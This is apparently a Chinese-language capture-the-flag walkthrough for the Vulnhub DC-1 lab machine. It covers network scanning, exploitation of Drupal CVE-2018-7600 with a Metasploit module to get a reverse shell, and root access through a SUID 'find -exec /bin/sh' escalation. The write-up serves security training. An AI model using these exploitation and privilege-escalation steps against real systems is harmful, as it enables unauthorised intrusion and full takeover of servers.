DC-1靶机渗透实战
DC系列靶机介绍
DC系列是Vulnhub为广大爱好者和网安学习提供的各种漏洞靶场,可以供多种虚拟机下载安装,提供各种有趣的实战。
DC-1靶机下载
https://www.five86.com/downloads/DC-1.zip
DC-1靶机安装
下载完用Vmware打开ova文件即可。
DC-1靶机环境配置
将网络连接模式改成NAT,使其与kali攻击机处于同一局域网
DC-1靶机渗透开始
①信息收集:
首先通过arp-scan -l 命令收集处于同一局域网内的主机IP,推断出DC-1目标靶机的IP是192.168.100.135(注意:每个人靶机的IP不同,请根据自己的网络具体判断),这里的1号主机是自己的物理机,2号是网关,254号是虚拟网卡的DHCP的服务器。
nmap -sV 192.168.100.135
扫描常见端口是否打开,以及具体的服务版本号
②漏洞发现
发现有22,80端口开启,尝试访问80端口
发现是用Drupal框架搭建的网站,查看版本
whatweb http://192.168.100.135
发现版本号是Drupal 7尝试去搜索相关的漏洞的exp和poc
找到一个CVE-2018-7600编号的漏洞,我们可以选择用下载的exp和poc去验证;这里我们选择用kali自带的msfconsole来进行攻击,msfconsole已经将这个漏洞的exp和poc集成进去了!
③漏洞利用
利用msf设置攻击脚本,目标IP和反弹的shell的主机IP
use exploit/unix/webapp/drupal_drupalgeddon2
出现meterpreter说明成功
shell命令回弹一个对方电脑的shell
④SUID提权
发现是www-data用户,开始提权
python -c "import pty;pty.spawn('/bin/bash')" //通过这条命令可以优化界面显示
利用
find / -perm -u=s 2>/dev/null
这个命令可以查找有什么命令被赋予suid,从而利用其进行提权,这里我们发现了存在find提权
find 文件名 -exec /bin/sh \;
此时已经成功完成提权
⑤溜大街获取flag
在根目录没有发现,进入root家目录发现了最终的flag
用cat命令读取最终的flag
成功夺旗,渗透结束!